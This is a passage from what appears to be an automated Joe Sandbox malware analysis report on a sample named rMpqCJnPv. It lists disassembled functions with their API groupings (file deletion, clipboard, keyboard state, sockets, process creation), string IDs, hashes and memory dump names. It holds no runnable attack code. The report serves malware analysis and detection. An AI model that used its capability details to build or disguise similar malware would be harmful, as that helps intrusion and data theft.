                                                                                                                    • Opcode Fuzzy Hash: 59dcdab51f47b0a634fd4a16188f26c8f2a6bc9bd1c56be720e7c676ed12fe7f
                                                                                                                    • Instruction Fuzzy Hash: 67E10432A0868289F764AF3DD8401B9A790FBA6784FC45135EF4D466ADCF3CD46187A0
                                                                                                                    Function 00007FF7BB8672A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                    • API String ID: 3232708057-3289030164
                                                                                                                    • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                    • Instruction ID: 4c4e6e474496ccb462fe07f969186a653497463bf925edc61ec11e465c0fffeb
                                                                                                                    • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                    • Instruction Fuzzy Hash: 9CD18E22B1865285EB10EBADD4414EDA761FBAA794FC04032EF4E47ABDDF78D508C760
                                                                                                                    Function 00007FF7BB85D87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 890592661-1007645807
                                                                                                                    • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                    • Instruction ID: 829287e71b20f82fe6dbcff9ede7aba38fafa3cfacbe50a5fde0d7f33501031c
                                                                                                                    • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                    • Instruction Fuzzy Hash: 35214322A0855291EB20EB2CE454AAAA365BFEA744FC05031EF4D4397CDE3CD515C7A0
                                                                                                                    Function 00007FF7BB86A4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                    • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                    • Instruction ID: e688a1ab64c501385c97b3929356d1e898f84d11d0a467f8a9ebdd2d333a24df
                                                                                                                    • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                    • Instruction Fuzzy Hash: CF41A21160C64250EA50AB2DE5486B99391FB66BE4FC06131DEAE476BCDF3CE41AC7A0
                                                                                                                    Function 00007FF7BB8683D4 Relevance: 16.8, APIs: 11, Instructions: 255comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2762341140-0
                                                                                                                    • Opcode ID: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                                                                    • Instruction ID: 793f13e85f6e9375319feae5e9e51874d2dd16aebaffbb3b16522c00e41bd53b
                                                                                                                    • Opcode Fuzzy Hash: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                                                                    • Instruction Fuzzy Hash: 8EC15926A08B8185EB10EF6EE8841ADB7A4FB9AB94F854036DF4E47739CF38D455C350
                                                                                                                    Function 00007FF7BB8659D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                                                    • Instruction ID: b6688cb5bab3f45117b302454d5943c4736855d101b09832c56cd48a0964ffde
                                                                                                                    • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                                                    • Instruction Fuzzy Hash: FA417032A08A0695EB10AB6DD4801ACB771FB6A794F845532DF0D83779DF38E5A5C3A0
                                                                                                                    Function 00007FF7BB876C34 Relevance: 15.3, APIs: 10, Instructions: 296fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2395222682-0
                                                                                                                    • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                                                    • Instruction ID: 6e3d3c5257c689721295e72293c77db4e81ef8a8a4e5a6e6a60f48cf40ee43c8
                                                                                                                    • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                                                    • Instruction Fuzzy Hash: 00D15F36B04B4686EB10AF6ED4405ADB3A1FBA9B8CB904036CF4D57B68DF38D455C3A0
                                                                                                                    Function 00007FF7BB870D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1737998785-0
                                                                                                                    • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                                                    • Instruction ID: 8e407bcb1e3593bb6ffad430c11901adeab21ed5560b290fde5e2f8aa3c668a1
                                                                                                                    • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                                                    • Instruction Fuzzy Hash: 4F414D62A0864186EB04AB5ED45837CA760FFAAB85F845435CF4D0777ACF7CE06187A4
                                                                                                                    Function 00007FF7BB85B7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 4047182710-1173974218
                                                                                                                    • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                                    • Instruction ID: 76cdb5c6da0b69338f5b6a643c1ea0a06de98d0b41298531f8f3c16b3ac91e0f
                                                                                                                    • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                                    • Instruction Fuzzy Hash: 16815E22A0864295EB50FB6CE4801EDAB64FFA6394FC01032EF4E465BDDF38E559C760
                                                                                                                    Function 00007FF7BB873940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 540024437-0
                                                                                                                    • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                                    • Instruction ID: 352b25be031265d1b2009bdc62cda3c72beb2d1a58a68f082fe3309ccecc456d
                                                                                                                    • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                                    • Instruction Fuzzy Hash: 26419061B0868285EB10EF2ED44026CA760FFA6BA4F844531DF9E477BACF3CE1658754
                                                                                                                    Function 00007FF7BB85BC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                    • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                                                    • Instruction ID: 5d6fb78222e5f3a2739155347bcf86324f7fb171ab579882103a420c6176a6b8
                                                                                                                    • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                                                    • Instruction Fuzzy Hash: 30417162A28A4292EA50EB6CE4401ADA364FFA5790FD01132EF5E036B9DF7CE515C760
                                                                                                                    Function 00007FF7BB81AF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1239891234-0
                                                                                                                    • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                                                    • Instruction ID: af5642764063bab7fc37b130f17a94a7c6e4c4bf347bb2452028554210edf483
                                                                                                                    • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                                                    • Instruction Fuzzy Hash: A3317E32618B8186DB609F2CE8442EEB3A4FB99794F900135EF9D43B68DF38D565CB50
                                                                                                                    Function 00007FF7BB84D2C4 Relevance: 9.1, APIs: 6, Instructions: 77processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1413079979-0
                                                                                                                    • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                                                    • Instruction ID: 690651d808260d7fd4fd01d4e0925d3b6625238e9e234a777b8ce63c70e487d7
                                                                                                                    • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                                                    • Instruction Fuzzy Hash: 7031AE32608B8586EB609F1AE4847AAB3A5FB95B90F445036DFCD03B28DF3DD455CB50
                                                                                                                    Function 00007FF7BB7EBE70 Relevance: 8.6, Strings: 6, Instructions: 1141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                                                                    • API String ID: 0-2187161917
                                                                                                                    • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                                                    • Instruction ID: b167cf5fa77474db6fbc87b9bbf4131de96e6d5dbb4f748c47135c8e820010a9
                                                                                                                    • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                                                    • Instruction Fuzzy Hash: C7B2E5B6A0869186EB209F6C94042BDB7A5FF26748F904036DF4957BBCDF78E850C760
                                                                                                                    Function 00007FF7BB874074 Relevance: 7.6, APIs: 5, Instructions: 148networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                                                    • Instruction ID: d953c85588aa1562da50f4b6dca91f476f737751ff12130a4ff7c31eb78bf1e8
                                                                                                                    • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                                                    • Instruction Fuzzy Hash: D7519221B1865281EB00FB5ED404569AB94BF9EFE4F884132DF5D077BACE3CE11087A4
                                                                                                                    Function 00007FF7BB7E1CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                                    • Instruction ID: 570e87a14173688c6577e86ee8ffdc4658d89f1fdd907d4f3c374d727f6e3338
                                                                                                                    • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                                    • Instruction Fuzzy Hash: FE51CD32A186818BE758EF3DC8445A9B764FF5A754F400232EF5A43BA9CF38E461C750
                                                                                                                    Function 00007FF7BB865F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
